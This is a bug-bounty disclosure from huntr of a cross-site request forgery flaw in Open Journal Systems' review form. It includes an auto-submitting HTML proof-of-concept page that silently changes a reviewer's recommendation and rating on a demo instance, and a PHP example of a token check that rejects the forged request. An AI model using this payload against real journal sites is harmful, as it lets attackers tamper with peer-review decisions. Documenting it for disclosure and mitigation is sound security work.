huntr: Hainguyen0207, 0C7F1981-3BBA-4508-A07E-4CB9A2553216
History: Oct 12, 2023 - 6:25 p.m.

CSRF in Review Details

2023-10-12 18:25:11
hainguyen0207
www.huntr.dev
6
csrf
vulnerability
fake review

AI Score

7.1

Confidence

Low

EPSS

0.001

Percentile

24.1%

Description

CSRF in Review Details

Proof of Concept

1. The attacker sends a forged form to the user

    <html>
      <body>
        <form action="https://demo.publicknowledgeproject.org/ojs3/testdrive/index.php/testdrive-journal/$$$call$$$/grid/users/reviewer/reviewer-grid/review-read">
          <input type="hidden" name="csrfToken" value="" />
          <input type="hidden" name="reviewAssignmentId" value="12" />
          <input type="hidden" name="submissionId" value="697" />
          <input type="hidden" name="stageId" value="3" />
          <input type="hidden" name="recommendation" value="2" />
          <input type="hidden" name="quality" value="2" />
          <input type="hidden" name="submitFormButton" value="" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>

2. The user clicks, and the Recommendation and Reviewer rating are changed without the user intending it

Video PoC

https://drive.google.com/file/d/1jUapGuHL1vR173QqXCdTGxybLXgbG99M/view?usp=sharing

Payload PoC

https://drive.google.com/file/d/11Xob6yqU12MEpK1aJVWRIJi5-3aduVu5/view?usp=sharing
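A server-side check that refuses the request from the proof of concept, as an added example that is not part of the original report and is not OJS code. The function names and the session layout are assumptions, and the sample requests are constructed from the form fields above.

```php
<?php
declare(strict_types=1);

// Added example, not OJS/PKP code. Function names and session keys are hypothetical.

/** Issue one random token per session and reuse it for every form rendered in it. */
function issueCsrfToken(array &$session): string
{
    if (empty($session['csrfToken'])) {
        $session['csrfToken'] = bin2hex(random_bytes(32));
    }
    return $session['csrfToken'];
}

/** Allow a state-changing request only if it is a POST carrying the session's token. */
function isRequestAllowed(string $method, array $params, array $session): bool
{
    // The form in the report has no method attribute, so the browser sends it as GET.
    if (strtoupper($method) !== 'POST') {
        return false;
    }
    $expected = $session['csrfToken'] ?? '';
    $supplied = $params['csrfToken'] ?? '';
    // A missing, empty or non-string token (e.g. csrfToken[]=x) must never pass,
    // even when the session itself holds no token yet.
    if (!is_string($expected) || !is_string($supplied)
        || $expected === '' || $supplied === '') {
        return false;
    }
    // Constant-time comparison of the session token with the submitted one.
    return hash_equals($expected, $supplied);
}

// Constructed sample requests built from the fields of the form in the report.
$session = [];
$token   = issueCsrfToken($session);
$forged  = ['csrfToken' => '', 'reviewAssignmentId' => '12', 'submissionId' => '697',
            'stageId' => '3', 'recommendation' => '2', 'quality' => '2'];
$legit   = ['csrfToken' => $token] + $forged; // array union: the left-hand token wins

$cases = [
    'forged form, sent as GET'      => isRequestAllowed('GET', $forged, $session),
    'forged form, sent as POST'     => isRequestAllowed('POST', $forged, $session),
    'own form with session token'   => isRequestAllowed('POST', $legit, $session),
    'valid-looking token, no login' => isRequestAllowed('POST', $legit, []),
];
foreach ($cases as $label => $allowed) {
    printf("%-30s %s\n", $label, $allowed ? 'allowed' : 'rejected');
}
```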
